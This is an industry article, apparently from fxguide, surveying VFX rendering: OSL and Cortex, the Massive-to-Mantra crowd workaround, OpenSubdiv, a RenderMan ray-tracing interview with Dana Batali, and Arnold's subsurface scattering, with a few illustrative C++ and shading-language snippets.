    Zap says the difference between MDL and OSL is a “little bit like 6 of one and half a dozen of the other.” While it is clear Autodesk has not decided on a unified material system, one would expect Nvidia to be very keen to get Autodesk on board, and one would also expect that Autodesk, with multiple products, would benefit from having a unified shader language.

    SPI and the OSL community would of course be very happy to see Autodesk use OSL more widely in their products, as Autodesk currently only has Beast supporting it, and Autodesk is Nvidia’s biggest customer for Mental Ray. Zap would not be drawn on whether Autodesk prefers to move more towards MDL or OSL, but one gets the distinct impression that the 3D powerhouse is actively exploring the implications of both. If Autodesk were to throw its weight behind something like OSL, it would be decisive for its long-term adoption. “I believe it would be a great fit across a wide array of their applications. I’d love for you to reach out to them directly as well as it would be great if they had more to share beyond Beast,” offered Bredow.

    Given Sony’s use of OSL, one might expect Solid Angle’s Arnold to support OSL, but as of now it does not. The company is closely watching Sony’s use of OSL, and Marcos Fajardo explains that “we are looking at it with a keen eye and I would like to do something about it – maybe next year,” but nothing is implemented right now.

    Many other companies who do not yet support OSL, such as Next Limit, are actively looking at OSL to perhaps support it in an upcoming release of Maxwell.

    1.7.5. Cortex (major support from Image Engine)

    Image Engine, in collaboration with several other companies, has been promoting a new system for visual effects development (C++ and Python modules) that provides a level of common abstraction, unifying the way a range of common vfx problems are solved and rendered. Cortex is a suite of open source libraries providing a cross-application framework for computation and rendering. The Cortex group is not new, but it has yet to reach critical mass, although as with many successful projects of this kind it benefits from being used in production and facing real-world tests, particularly inside Image Engine, which uses it to tackle problems normally much bigger than a company its size could take on. For example, it provides a unified solution to fur/hair, crowds and procedural instancing. Image Engine used it most recently on Fast and Furious 6, and it is used extensively throughout the studio.

    John Haddon, R&D Programmer at Image Engine: “Cortex’s software components have broad applicability to a variety of visual effects development problems. It was developed primarily in-house at Image Engine and initially deployed on District 9. Since then, it has formed the backbone of the tools for all subsequent Image Engine projects, and has seen some use and development in other facilities around the globe.”

    An example outside Image Engine was shown by Ollie Rankin from Method Studios, who presented at an earlier SIGGRAPH Birds of a Feather session on Cortex and how it can be used in a crowd pipeline. He had used a typical Massive pipeline, with Massive providing agent motivation, yet the team felt Massive was not ideal for procedural crowd placement. In a hack for the film Invictus, they used Houdini to place the Massive agents, and they rendered in Mantra.



    The hack workaround was very code- and job-specific.

    Massive exports native RIB files and, like RenderMan, Mantra would work with Massive – Mantra is very similar to RenderMan – but it was a hack to introduce Houdini just to handle procedural placement while still getting agent animation from Massive. Massive provided just the moving, waving, cheering agents, but their placement was all from Houdini, as “we didn’t need Massive to distribute people into seats in a stadium – we knew exactly where those seats were – all we needed was to turn those seat positions into people.” The rendering did require a bridge between Massive and Mantra, achieved with a custom memory hack using PRMan’s DSO (Dynamic Shared Object) mechanism.

    “While we were happy with the way that Massive manipulates motion capture and happy with the animation it produces, we felt that its layout tools weren’t flexible enough for our needs”, Rankin told fxguide. “We realised that the challenge of filling a stadium with people essentially amounts to turning the known seat positions into people. We also wanted to be able to change the body type, clothing and behaviour of the people, either en masse or individually, without having to re-cache the whole crowd. We decided that a Houdini point cloud is the ideal metaphor for this type of crowd and set about building a suite of tools to manipulate point attributes that would represent body type, clothing and behaviour, using weighted random distributions, clumping and individual overrides.”
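
    As a rough illustration of the point-cloud idea (hypothetical code, not Method’s actual tools): each seat position becomes a point whose body type, clothing and behaviour are drawn from weighted random distributions, with a deterministic per-point seed so individuals can be overridden without re-caching the whole crowd.

    #include <array>
    #include <cstdint>
    #include <random>
    #include <string>
    #include <utility>
    #include <vector>

    struct CrowdPoint {                     // one seat position -> one agent
        float x, y, z;
        std::string bodyType, clothing, behaviour;
    };

    // Pick an entry from weighted options using a deterministic per-point seed,
    // so re-evaluating the crowd never reshuffles agents that were not touched.
    std::string weightedPick(const std::vector<std::pair<std::string, float>>& options,
                             std::uint32_t seed) {
        std::mt19937 rng(seed);
        float total = 0.0f;
        for (const auto& o : options) total += o.second;
        std::uniform_real_distribution<float> dist(0.0f, total);
        float r = dist(rng);
        for (const auto& o : options) {
            if ((r -= o.second) <= 0.0f) return o.first;
        }
        return options.back().first;
    }

    // Turn known seat positions into people: attributes come from weighted
    // random distributions; an individual can later be overridden by editing
    // just that point's attributes.
    std::vector<CrowdPoint> fillSeats(const std::vector<std::array<float, 3>>& seats) {
        const std::vector<std::pair<std::string, float>> bodies =
            {{"slim", 0.4f}, {"average", 0.5f}, {"heavy", 0.1f}};
        const std::vector<std::pair<std::string, float>> behaviours =
            {{"sitting", 0.6f}, {"cheering", 0.3f}, {"waving", 0.1f}};
        std::vector<CrowdPoint> crowd;
        for (std::size_t i = 0; i < seats.size(); ++i) {
            const std::uint32_t seed = static_cast<std::uint32_t>(i);
            crowd.push_back({seats[i][0], seats[i][1], seats[i][2],
                             weightedPick(bodies, seed * 2u),
                             "team_colours",
                             weightedPick(behaviours, seed * 2u + 1u)});
        }
        return crowd;
    }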

    They still needed a mechanism to turn points into people and this is where “we had to resort to a monumental hack.” Massive ships with a procedural DSO (Dynamic Shared Object) for RenderMan that can be used to inject geometry into a scene at render-time. It does so by calling Massive’s own libraries for geometry assignment, skeletal animation and skin deformation on a per-agent basis and delivering the resulting deformed geometry to the renderer. “Our hack was a plugin that would call the procedural, then intercept that geometry, straight out of RAM, and instead deliver it to Mantra,” Rankin explained.


    Cortex solution

    By comparison, a Cortex solution places a layer of Cortex procedural interface between Massive and the renderer – it can access and query the Massive crowd asset library and remove the need for the Houdini/PRMan DSO hack, while still allowing Houdini to render Massive’s agents. And once there is a unified, standard Cortex procedural hub, it becomes possible to swap out Houdini or move to a different renderer – all without rebuilding the kind of custom black-box hack that existed before.


    Moving forward – more flexibility and open to change

    The same coding approach and API interface used in this Massive–Houdini example could be used for Maya, Nuke or a range of other applications. By introducing a standardized Cortex layer, geometry, say, could be generated at render time in a host of situations, all deploying the same basic structure, without requiring new hacks each time or needing to be redone if a piece of software changes version or is replaced. This is just one example of the range of things Cortex is designed to help with: layout, modeling, animation and deferred geometry creation at render time. It can work in a wide variety of situations where interfaces between tools are needed in a production environment.
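
    As a rough conceptual sketch of such a render-time procedural layer (hypothetical interface names, not Cortex’s actual C++/Python API), the host application and the renderer only talk to an abstract interface, so either side can be swapped without touching the crowd logic:

    #include <string>
    #include <utility>
    #include <vector>

    // Hypothetical abstraction of "a renderer" -- in a Cortex-like setup this
    // could be backed by RenderMan, Mantra, Arnold, etc.
    class RendererInterface {
    public:
        virtual ~RendererInterface() = default;
        virtual void emitMesh(const std::string& assetName,
                              const std::vector<float>& transform) = 0;
    };

    // Hypothetical render-time procedural: geometry is produced lazily, only
    // when the renderer asks for it (deferred geometry creation).
    class CrowdProcedural {
    public:
        explicit CrowdProcedural(std::string agentCachePath)
            : cachePath_(std::move(agentCachePath)) {}

        // Called by whichever renderer sits behind the interface, at render time.
        void render(RendererInterface& renderer) const {
            for (const auto& agentTransform : loadAgentTransforms()) {
                renderer.emitMesh(cachePath_, agentTransform);  // e.g. a Massive agent
            }
        }

    private:
        std::vector<std::vector<float>> loadAgentTransforms() const {
            // ...read placements from a point cloud (e.g. exported from Houdini)...
            return {};
        }
        std::string cachePath_;
    };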

    1.7.6. OpenSubDiv (major support from Pixar)

    OpenSubdiv is a set of open source libraries that implement high-performance subdivision surface (subdiv) evaluation on massively parallel CPU and GPU architectures. This codepath is optimized for drawing deforming subdivs with static topology at interactive framerates. The resulting limit surface matches Pixar’s RenderMan to numerical precision. The code embodies decades of research and experience by Pixar, and a more recent and still active collaboration on fast GPU drawing between Microsoft Research and Pixar.

    OpenSubdiv is covered by an open source license and is free to use for commercial or non-commercial work. This is the same code that Pixar uses internally for animated film production. In fact, it was the short film Geri’s Game that first used subdivision surfaces at Pixar – see the fxguide story, which includes a link to the SIGGRAPH paper explaining it.

    Pixar is targeting SIGGRAPH LA 2013 for release 2.0 of OpenSubdiv. The major feature of 2.0 will be the Evaluation (eval) api. This adds functionality to:

    • Evaluate the subdiv surface at an arbitrary parametric coordinate and return limit point/derivative/shading data.
    • Project points onto the subdiv limit and return parametric coordinates.
    • Intersect rays with subdiv limits.

    “We also expect further performance optimization in the GPU drawing code as the adaptive pathway matures.” More information is available at the OpenSubdiv site.
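
    In practice an eval API of this kind gets used along the following conceptual lines (hypothetical class and method names for illustration only; OpenSubdiv’s real classes differ):

    #include <array>

    struct LimitSample {
        std::array<float, 3> position;  // point on the limit surface
        std::array<float, 3> dPdu;      // first derivatives, useful for
        std::array<float, 3> dPdv;      //   normals and shading
    };

    class SubdivLimitEvaluator {
    public:
        // Evaluate the limit surface of 'face' at parametric coordinate (u, v).
        LimitSample evaluate(int face, float u, float v) const {
            // ...would delegate to the subdiv library's evaluator here...
            (void)face; (void)u; (void)v;
            return LimitSample{};
        }

        // Project an arbitrary point onto the limit surface, returning the
        // closest face and its (u, v) coordinate.
        bool project(const std::array<float, 3>& point,
                     int* face, float* u, float* v) const {
            // ...closest-point search against the limit surface...
            (void)point; (void)face; (void)u; (void)v;
            return false;
        }
    };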


    Rendered in Maxwell Render.

    Read more on the State of Rendering in Part 2, covering RenderMan, Arnold, V-Ray, Maxwell, Mantra, Modo, Lightwave, Mental Ray, 3Delight, finalRender, Octane, Clarisse iFX, Lagoa and Arion2. We also look at, and question, the next stage of rendering.

    Plus the new term at fxphd.com covers rendering in more depth.

    Special thanks to Ian Failes.

  • The State of Rendering – Part 2


    In Part 1 of The State of Rendering, we looked at the latest trends in the visual effects industry including the move to physically plausible shading and lighting. Part 2 explores the major players in the current VFX and animation rendering markets and also looks at the future of rendering tech.

    There is more about rendering at www.fxphd.com this term.

    There are many renderers, of course, but we have focused below on the primary renderers that have come up during the last 18 months of writing fxguide stories. It is not an exact science, but fxguide has a ringside seat on the industry and the list below covers the majority of key visual effects and non-exclusive in-house animation renderers. We have excluded gaming engines and many fine non-vfx applications.

    The order is not in terms of market share – in reality the 3ds Max default renderer or Mental Ray would swamp many others due to the market share of Autodesk with Max, Maya and XSI. But the order does indicate a subjective rough grouping based on our feedback from major studios and artists around the world.


    2. Major players

    2.1 RenderMan – Pixar
    2.2 Arnold – Solid Angle
    2.3 V-Ray – Chaos Group
    2.4 Maxwell Render – Next Limit
    2.5 Mantra – Side Effects Software
    2.6 CINEMA 4D – Maxon
    2.7 Modo – The Foundry
    2.8 Lightwave – Newtek
    2.9 Mental Ray – Nvidia
    2.10 3Delight – DNA Research
    2.11 FinalRender – Cebas
    2.12 Octane – Otoy
    2.13 Clarisse iFX
    2.14 Lagoa


    2.1 RenderMan – Pixar

    fxguide will soon be publishing a piece on the 25th anniversary of RenderMan. In that story we look back with contributions and interviews from Ed Catmull, Loren Carpenter and Rob Cook, each of them now a senior manager or research fellow at Disney/Pixar, but also founding members of the team that developed RenderMan and defined a specification so far-reaching that the Pixar PRMan implementation can fairly be called the greatest renderer in the brief history of computer graphics. No other renderer has contributed so much, been used so widely or for so long, or been responsible for so much creative success, as seen in the near endless stream of VFX Oscar-winning films that have used it.

    Image courtesy of Dylan Sisson, Pixar. The left image uses image based lighting, with geometric area lights used for the right image. The same shaders are used for both images. Environment lights are used in both images, with one bounce color bleeding. On the right, the neon tubes are emissive geometry.

    In those interviews and podcasts you can hear first hand about the evolution of the product and spec, but you will also hear about the leadership of Dana Batali. While RenderMan has many contributors and excellent researchers, Ed Catmull, President of Disney and Pixar, points out that one thing that has always been true behind the scenes and screens of RenderMan has been the lack of committee thinking. At the start, Catmull points out, “we had Pat Hanrahan as the lead architect on the design of RenderMan, and Pat is a remarkable person. I set up the structure so Pat made all the final calls, at the same time we involved as many companies as we could, 19 if I recall… and of those 6 or 7 were really heavy participants, but that being said, we gave the complete authority to make the final choice to a single person. And I think that was part of the success – that it has the integrity of the architecture that comes from a single person, while listening to everyone else.”

    Today there is also one man responsible for guiding the product: Dana Batali, VP of RenderMan Products at Pixar. Ed Catmull explains: “The way it has developed is that we have given Dana a free hand in how the product develops, it isn’t as if he comes to me and says is it OK for us to put the following features in – he never asks. The charter is that he is meant to respond to what is needed. We set it up so they make changes to what is needed, they never ask me what should go in – they just do what the right thing is and we have been doing that for many years.” In this respect there is still today one person with a single vision of what should be developed for RenderMan’s worldwide clients, including Disney/Pixar. “Yes, that is the set up and one I believe strongly in,” reinforces Catmull.

    Dana Batali in turn sees his role as simply focusing the intense collaboration of the incredible team of scientists and researchers inside Pixar’s RenderMan development group based in Seattle. There is no doubt that team is exceptional, something easily judged by the volume of papers and published articles that have flowed from the team since its inception, much of it published at SIGGRAPH, as they will do again next week.

    fxguide has recently covered the advances in RenderMan’s use in Monsters University and the move to ray tracing with physically based shading and lighting, so for this article we decided to get very technical on the implications and implementations of the ray tracing framework in the current release and the upcoming new RPS18 release with Dana Batali.

    Art from Monsters University.

    Background: traditional approach

    Some background, as RenderMan’s own notes point out, CGI rendering software approximates the rendering equation. This equation models the interaction of shape, materials, atmosphere, and light, and, like many physics-based formulations, takes the form of a complex multidimensional integral. The form of the equation is such that it can only be practically approximated. This is accomplished by applying generic numerical integration techniques to produce a solution. The goal of rendering algorithm R&D is to produce alternate formulations of the equation that offer computational or creative advantages over previous formulations.

    At the heart of the rendering equation is the description of how light is scattered when it arrives at a surface. The fundamental question is: what light is scattered to the eye at this point in the world? The portion of a rendering program focused on solving this problem can be called the surface shader, or the material integrator. In RenderMan, the canonical or idealized surface shader has traditionally been decomposed into a summation of the results of several independent integrators. In 1990, they represented a “theoretically perfect” material as:

    Ci = Ka*ambient() + Kd*diffuse(N) + Ks*specular(I, N, roughness)

    Additional terms were later added to simulate incandescence and translucence, but, fundamentally, the simplicity and approximate nature of this formulation was driven by the computational resources available at the time.

    In 1987 the RenderMan Shading Language (RSL) was introduced. Over the next few years, until about 2002, RSL evolved to include new techniques: deep shadows, “magic lights”, more elaborate proceduralism.

    From 2002 to 2005 there were great advances, but this second stage was very much a series of complex new approaches from different areas rather than one unified trend. For example, during this period ray tracing was added: gather(), transmission() and indirectdiffuse() all extended the collection of “built-in integrators” (e.g. diffuse(), specular()). Point-based subsurface scattering was also added, which was a huge advance. From 2002 until the present, new custom shaders have implemented things such as area lights with ray traced shadows, much of this riding on the back of two key aspects:

    1. Techniques such as ray tracing became more affordable due to Moore’s law.
    2. Memory continued to grow, making the Reyes scene-memory approach less vital for complex scenes.

    By 2005, armed with significantly more computational resources, the RenderMan team could afford ever more accurate approximations of the physical laws. Rather than start afresh, new terms were added, evolving into a morass of interoperating illuminance loops, gather blocks, light categories, and indirectdiffuse calls. Moreover, many of these additions were point-based solutions, which meant pre-baked data, which in turn made rendering pipelines more complex and therefore difficult to maintain and comprehend.

    The third phase of “illumination-related technology” is the move to allowing much purer ray tracing solutions: for example, in 2011 pure ray traced subsurface scattering was added, along with the introduction of the “raytrace hider”.

    Today, with faster multi-threaded computers, the new approach documented above is expanding daily. There is a growing school of proponents of the idea that physics-based (ray-traced) rendering is now the most efficient way to produce CGI. The argument is that it is cheaper for a computer to produce physically plausible images automatically than it is for lighting artists to mimic the physical effects with cheaper (i.e. non ray-traced) integrators. With RPS 18 (being shown at SIGGRAPH 2013), there is support for separation of the integrator from the material, and a streamlined, fast, pure C++ shading environment augmented by built-in advanced GI integration technology (Bidirectional Path Tracing with Vertex Merging).

    In this latest phase, Pixar felt that the time had arrived to embrace geometric sources of illumination (i.e. area lights) and to jettison the venerable, but entirely non-physical, point light source. Once the new, more affordable area lights enter the picture, things change; prior to this, using area lights and other new complex lights was expensive. This is largely due to the fact that the shadows cast by area lights are expensive to compute. Add to that HDR IBL (high dynamic range, image-based lighting) and the previous generation of RSL shaders had been pushed past their limit.

    What was needed was new integration support from the renderer.


    New ray tracing and physically based methods

    The new RenderMan approach is not replacing the old but offering an alternative. The new beguilingly simple characterization of a material integrator is now:

    public void lighting(output color Ci)
    {
      /* Sum the renderer's built-in integrators: */
      Ci = directlighting(material, lights) +   /* direct light from (area) light sources */
           indirectdiffuse(material) +          /* indirect diffuse: color bleeding */
           indirectspecular(material);          /* specular response to indirect paths */
    }

    The surface shader’s lighting method is where Pixar integrates the various lighting effects present in the scene. To accomplish physically plausible shading under area lights, Pixar has combined the diffuse and specular integrators into the new directlighting integrator. Like the earlier work, the new integrator is only concerned with light that can directly impinge upon the surface. Unlike that earlier work, the combined integrator offers computational advantages since certain computations can be shared. And to support the physical notion that the specular response associated with indirect light transport paths should match the response to direct lighting, Pixar introduced a new indirectspecular integrator. By moving the area light integration logic into the renderer they made it possible for RSL developers to eliminate many lines of illuminance loops and gather blocks.

    All of this was seen most recently when key members of the Pixar team such as Christophe Hery and others such as Jean-Claude Kalache implemented physically based lighting and shading inside RenderMan using ray tracing. (Read our article on MU.)

    (* select notes from RPS18 reproduced with permission).


    Dana Batali, VP of RenderMan products at Pixar

    fxg: As a hybrid renderer, how do the older Reyes/RSL/illuminance loops play alongside the new ray tracing/physically based rendering and GI?

    DB: First: the term hybrid primarily refers to the combination of Reyes with ray tracing. GI is usually used to refer to “color-bleeding” or more advanced light transport effects and so it might be wise to keep these notions separate. Reyes has excellent characteristics for motion-blur and displacement because it can compute these effects very efficiently, reusing results across many pixels on the screen. Reyes also offers significant advantages in memory efficiency since it can bring-to-life and send-to-death objects on an as-needed basis. Our hybrid architecture allows a site to choose those objects that are known to the ray tracing subsystem and therefore can allow the rendering of more complexity than a pure-ray tracing solution could in the same memory footprint. This memory advantage diminishes in proportion to the percentage of objects that need to be ray traced. And certainly we’re seeing a trend to higher percentages of ray-traced objects. But ray-traced hair & fur were beyond the memory budget for MU and RenderMan’s hybrid architecture was crucial in their ability to produce the film. So again, our hybrid renderer allows a site to select the “sweet-spot” that best matches their production requirements.

    Now to the question of illuminance loops. All renderers break the solution of the rendering equation into direct-lighting and indirect-lighting (indirect-lighting refers to reflections, color-bleeding, subsurface scattering, etc). The term “illuminance loop” refers to the traditional manner in which RSL represented the delivery of direct-lighting (aka “Local Illumination” or “LI”). And thus, it has little to do with GI. But what it does have to do with is plausibility. In the real world, all sources of direct illumination (aka luminaires, emissive objects, etc.) have non-zero area. A long-standing corner that CGI has cut constrains luminaires to perfect, mathematical point emitters. This corner-cutting is no longer tenable since it results in pictures that aren’t sufficiently realistic (by 2013 standards). To address this issue we extended RSL to broaden the communication channel between light shaders and surface shaders. Moreover, we extended the built-in integration capabilities of the renderer with the introduction of the directlighting function. Christophe Hery’s shaders (referring to the work done in Monsters University) heavily rely on the inter-shading communication capabilities of “RSL 2.0” but predate the maturation of RenderMan’s built-in directlighting capability. Both systems rely on MIS (multiple importance sampling) to reduce the grainy noise associated with luminaire sampling. For a fixed number of direct-lighting samples, it’s a fundamental property that the noise increases with the size of the luminaires. The primary source of noise is the complex assortment of objects that reside between the source of illumination and a receiving surface. The efficient computation of shadows has been a central focus of CG research since its inception and area lights are *much* more expensive to compute shadows for.

    RenderMan supports two means for computing area light shadows and both reside behind the RSL function: areashadow. The simplest solution is to ray trace the shadows and this is the preferred solution as long as the shadow casting geometry can fit in memory. But with hundreds of hairy creatures in a Monsters University (MU) shot, all the shadow-casting geometry can’t fit in memory. Our hybrid solution allows us to produce a “deep shadow map” in a reyes-only (memory efficient) pre-pass that can be used by the areashadow function to produce realistic shadows during the beauty pass. RenderMan can combine the tracing of rays against real geometry with the evaluation of area shadow maps (which might only contain shadow information for hair) to produce a hybrid shadowing solution.

    Finally, getting back to the topic of GI: with the widespread adoption of physically plausible (area) lights, it became feasible, even necessary, to consolidate the code and the parameters that control the integration of direct illumination with controls for indirect illumination. In practice this simply means: there should really be no difference between a reflection and a “specular highlight”. A photon arriving at a surface directly from a luminaire doesn’t behave any differently than a photon that arrived by a more indirect path. Prior to the consolidation, shaders would have two shader parameters to express the specular color and reflection color. While certainly offering lots of artistic control, this isn’t physically plausible. Only a single specular color should be needed. But the idea of taking away artistic controls can be very contentious and part of the significance of the success of “the GI efforts” on MU was the fact that a lot of lookdev and lighting artists had to be convinced that the benefits of physical plausibility outweigh the potential for artistic control that these traditional parameters represented. Christophe is a driving force of this message at Pixar.


    src="http://www.youtube.com/embed/bxdnsjLst1Y?rel=0" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Above: watch a Monsters University progression reel.


    fxg: It can be confusing when talking about ray tracing as Pixar has used forms of ray tracing for many years, but the new workflow is towards a more unbiased pure form of ray tracing, is that true?

    DB: Yes there has been a “raytrace hider” in RenderMan since RPS 16. There are still benefits delivered by the hybrid architecture in the form of the radiosity cache where various partial integration results can be reused. But there are controls to completely disable these features and cause RenderMan to operate as a simple, pure ray tracing engine. In RPS 18, we extended the ray trace hider to support path tracing since it offers a better interactive experience (during relighting) than its cousin, “distribution ray tracing”. We’ve found that path tracing has other complexity management advantages over distribution ray tracing insofar as it’s easier to understand and manage a ray count budget. In another application of the term “hybrid”, we actually commonly run RenderMan in a combination of distribution and path-tracing modes, favoring the former for indirect diffuse integration and the latter for indirect-specular integration.

    fxg: GI is not new to Pixar, but the techniques in MU were?

    DB: GI has been present in PRMan for many years. Part of the message here is that computers are now fast enough that it’s becoming tractable to broadly deploy GI. And certainly advancements like the radiosity cache make GI even more feasible. But the new thing is the trend to unify the indirect and direct integration frameworks and this has been a substantial effort that will continue for the foreseeable future. On the production side, HDRI, tonemapping, exposure, AOVs etc are all components that must agree. In a larger production studio, there are numerous plumbing challenges. At Pixar, many new Slim templates needed to be developed around the core technology. New features to Slim were added to support the interplay between co-shaders and lights in Christophe’s shading system. New hotspots needed to be optimized since the production was pushing on things in new ways. RenderMan bugs needed fixing. And several new features were added to RenderMan to facilitate some of the plumbing changes.

    fxg: When does geometry get diced, and how long does it stay in memory? How do you exploit coherence?

    DB: Since 2002, RenderMan’s raytracing subsystem has supported a multiresolution tessellation cache. The idea is that the ray has a cross section (the ray differential) that is implied by the light transport path. As rays bounce around in a scene, ray differentials typically grow and we exploit that observation by caching the curved-surface tessellation at different levels of detail. GI is fundamentally incoherent and this is bad news for memory access coherence. The good news is that the broader ray differentials allow us to fudge the intersection and significantly reduce the memory thrash between diffuse and specular ray hits. Another parameter that can improve coherence is “maxdist”. Each ray carries with it a maximum distance that it can be traced. In old-school occlusion renders, setting a reasonable maxdist value on rays would ensure that rays launched from one side of a scene couldn’t cause hits on the other side. Coupled with RenderMan’s geometry unloading feature, this was a valuable tool to exploit coherence. This approach is less viable in a more plausibly-lit setting since there’s often no reasonable maxdist you can choose due to the variability of light locations and intensities.
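
    A crude illustration of the level-of-detail idea Batali describes (hypothetical code, not RenderMan’s): the wider the ray’s footprint at the hit, the coarser the cached tessellation that can safely be reused.

    #include <algorithm>
    #include <cmath>

    // Pick a tessellation cache level from a ray's footprint at the hit point.
    // Wider footprints (typical after diffuse bounces, where ray differentials
    // have grown) tolerate coarser cached geometry.
    int tessellationLevel(float rayFootprint,       // ray differential width at the hit
                          float finestEdgeLength,   // edge length of the finest tessellation
                          int   coarsestLevel) {    // number of coarser levels cached
        if (rayFootprint <= finestEdgeLength) return 0;           // full detail needed
        int level = static_cast<int>(std::log2(rayFootprint / finestEdgeLength));
        return std::min(level, coarsestLevel);
    }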

    fxg: Can you talk more about the MIS? And the balance between the peaks in the BRDF vs the hot spots in the scene? How do you go about approaching that? Is that something deep inside PRman, or is it exposed for shader writers, like if the shader writer wanted to do say Metropolis sampling?

    DB: MIS is nothing more than an unbiased means to weigh samples from different distributions. As a developer of a shader, the most common distributions to sample are the BSDF and the lighting. Metropolis sampling isn’t relevant in the context of a RenderMan shader since it performs MIS in path space, and the space of paths is a broader notion than what a single shader is responsible for.

    fxg: Some strengths of the Reyes rendering approach are displacement and motion blur, especially together. A few years ago, it felt like as soon as you turned on ray tracing, you pretty much lost these. How does the new renderer approach these?

    DB: Generally it is the case that displacement and motion blur are more expensive to solve with ray tracing than with Reyes. As more rays become affordable, the importance of the performance of these subsystems increases, and with that goes more development investment.

    Monsters University.

    fxg: How do you do soft shadow motion blurred fur without your renderfarm exploding? What tools are available to keep the memory under 20 Gig?

    DB: It’s my understanding that that was accomplished with RenderMan’s area shadow maps.

    fxg: We got an additional comment from Christophe Hery to expand on the area shadow maps

    Christophe Hery: We did use area shadow maps on hair and on “some” heavy scenes (crowds). We also used tricks, such as different hair densities in shadows than in camera contexts. But most (non-hair) shadows were actually ray traced. So the 20 GB memory limit was managed by people in rendering, optimizing by hand some of the knobs on the lights, for instance the number of samples.

    fxg: What are the limits of progressive rendering? It sounds like it might not be able to do subsurface if point clouds are still being baked. But what other limits are there?

    DB: RenderMan 17 offered support for progressive rendering of all indirect illumination effects including subsurface. This is great for interactive but may be substantially slower and less controllable than point-clouds. As usual, tradeoffs abound and what’s right for one show or studio may not be right for another.

    FXG: Thank you for your time.


     

    Photon beams for caustics – these images courtesy Per H. Christensen, Pixar.

    Photon beams for caustics – final render in RenderMan.


    A great example of the flexibility of RenderMan is the way it is used by Weta Digital for extremely large renders: splitting the rendering problem and using a GPU pre-renderer, PantaRay, to compute and store spherical harmonics ahead of the final render. This robust pre-render is very different from the point cloud pre-renders outlined elsewhere in this document, and you can read about it in our fxguide story.

    The new approach offered by RenderMan still needs to address the same issue all ray tracers do, which is memory limitations, but for most production shots (perhaps not Weta level) the one-pass approach offers greater simplicity of lighting control coupled with incredible realism. Moving from very complex shaders to having the renderer understand things such as BxDFs and geometric area lights results in a much better and cleaner rendering model. To some extent the older rendering model has been viable, with some ray tracing doing a ‘what’s the value at this hit’ style of integration. But that is not powerful enough moving forward into worlds where much more complex integration techniques are at play. The old shader programming models were not geared towards bidirectional or other integration techniques. Nor did they let the renderer help with complex problems (such as sampling geometric lights).

    RenderMan still very much supports both models, but recently the team has worked hard to service the trend of heavier and heavier fully ray traced shots. By redoing the shaders and making the system easier to implement as a full energy-conserving, physically based lighting system, the RenderMan team under Dana Batali’s leadership is hoping to secure a strong place in the next 25 years of computer graphics.


    2.2 Arnold – Solid Angle

    Much of the history of Solid Angle and the development of Arnold by its founder Marcos Fajardo was covered in our previous Art of Rendering piece.

    Arnold is a path tracer that tries to solve ray tracing for film and media production as efficiently as possible, with as few tricks, hacks and workarounds from the end user as possible. “We are just trying to solve the radiance equation, on the fly, without doing any type of pre-computation or pre-passes,” explains Fajardo. “So we just trace a lot of rays around and hope to get an accurate answer. The challenge is to design a system that is optimized so that it traces a relatively small number of rays for a given quality, and also the ray tracing needs to be very fast. That’s what we do every day: we try and optimize the renderer, both with mathematical processes to optimize the Monte Carlo equations and by making the code very fast – so those two things – the speed of the rays and the number of the rays – that is what we work on every day.”

    Pacific Rim. This image rendered in Arnold by ILM. Courtesy Warner Bros. Pictures.

    The number of rays greatly affects everything from image quality to render speed. In the video below we take a simple scene and demonstrate how the various adjustments increase or decrease the render. It is worth noting again that to halve the noise one needs to quadruple the number of ray samples.
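
    That rule is just the 1/√N convergence of Monte Carlo integration: the standard error of the estimate falls with the square root of the sample count, so quadrupling the samples roughly halves the noise. A toy estimator (illustrative only, unrelated to Arnold’s internals) makes this easy to verify:

    #include <cmath>
    #include <cstdio>
    #include <random>

    // Estimate the integral of f(x) = x*x over [0,1] (exact value 1/3) with N
    // uniform samples and report the standard error, which shrinks as 1/sqrt(N).
    void estimate(int numSamples, std::mt19937& rng) {
        std::uniform_real_distribution<double> u(0.0, 1.0);
        double sum = 0.0, sumSq = 0.0;
        for (int i = 0; i < numSamples; ++i) {
            double f = u(rng);
            f *= f;
            sum += f;
            sumSq += f * f;
        }
        double mean = sum / numSamples;
        double variance = sumSq / numSamples - mean * mean;
        double stdError = std::sqrt(variance / numSamples);
        std::printf("N = %7d  estimate = %.5f  noise ~ %.5f\n", numSamples, mean, stdError);
    }

    int main() {
        std::mt19937 rng(1234);
        for (int n = 1024; n <= 65536; n *= 4) estimate(n, rng);  // noise roughly halves each step
    }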

    Latest advances

    Solid Angle has achieved remarkable success in producing incredibly powerful ray tracing that balances render time, memory management and image quality. It continues to grow and expand around the world.

    Arnold remains an incredibly important product. Not only is it very fashionable and on most studios’ render roster (or being evaluated for inclusion), but the company has a strong commitment to R&D and, like Pixar before them, is committed to sharing and publishing their work. As such the company is held in very high regard, and there is no doubt their focus on advances inside a production framework is yielding spectacular results that are still obtainable inside the budget constraints (time and money) of the real world.

    Solid Angle’s Arnold has several key advances; we highlight four here:

    • SSS
    • Major advances in MIS
    • Multi-Threading Performance
    • New Volumetric rendering

    src="http://www.youtube.com/embed/0MJ9lbKF2-U?rel=0" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Above: watch Arnold’s 2013 reel.

    2.2.1 SSS

    The new Arnold renderer does raytraced SSS, which does away with point clouds. This is a remarkable advance, and the early results are incredibly realistic.

    The new Arnold SSS. Image courtesy of Digic Pictures / Ubisoft Entertainment.

    Note: a material definition or BRDF becomes a BSSRDF (bidirectional scattering-surface reflectance distribution function) when considering SSS.

    Some background first on the state of the art of SSS. Starting with a landmark paper by Jensen et al. (SIGGRAPH 2001: A Practical Model for Subsurface Light Transport), most subsurface scattering approaches have been approximations, normally based on dipoles: a method that approximates the scattering beneath the surface using points, with the dipole maths placing sources above and below the surface to control the amount and distribution of the scattering.

    Jensen provided single scattering with a dipole point source diffusion approximation for multiple scattering. The name dipole refers to the paired plus and minus sources. This original dipole method was a breakthrough in allowing scattering beneath a surface, which really is the science of treating, say, skin or similar surface materials as dispersing/scattering transmissive materials. If ray tracing is complex, then scattering the light beneath the skin (BSSRDF), with different amounts of scatter depending on the wavelength of light, is incredibly complex and vastly computationally difficult.

